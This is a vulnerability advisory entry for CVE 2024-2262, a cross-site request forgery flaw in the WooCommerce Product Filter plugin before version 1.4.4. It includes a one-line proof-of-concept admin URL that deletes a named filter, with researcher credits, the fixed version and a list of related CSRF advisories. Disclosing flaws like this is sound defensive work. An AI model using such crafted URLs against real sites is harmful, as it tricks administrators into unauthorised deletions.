WooCommerce Product Filter < 1.4.4 – Filter Deletion via CSRF | CVE 2024-2262 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs

Proof of Concept

Make a logged in admin open the URL below to make them delete the filter with the slug test1:

https://example.com/wp-admin/admin.php?page=wpf_search&action=delete&paged=1&wpf_post[]=test1&action2=delete

Affects Plugins

themify-wc-product-filter

Fixed in 1.4.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

30544377-b90d-4762-b38a-ec89bda0dfdc

Timeline

Publicly Published

2024-03-11 (about 1 year ago)

Added

2024-03-11 (about 1 year ago)

Last Updated

2024-03-11 (about 1 year ago)

Other

Published

Title

Published

2025-09-10

Title

Analytics Reduce Bounce Rate <= 2.3 - Cross-Site Request Forgery

Published

2025-03-05

Title

Podlove Podcast Publisher < 4.2.3 - Cross-Site Request Forgery via ajax_transcript_delete Function

Published

2025-04-24

Title

Print Science Designer <= 1.3.155 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-04-11

Title

Church Admin < 4.0.28 - Cross-Site Request Forgery

Published

2014-08-01

Title

SolveMedia 1.1.0 - solvemedia.admin.inc Admin Options Page CSRF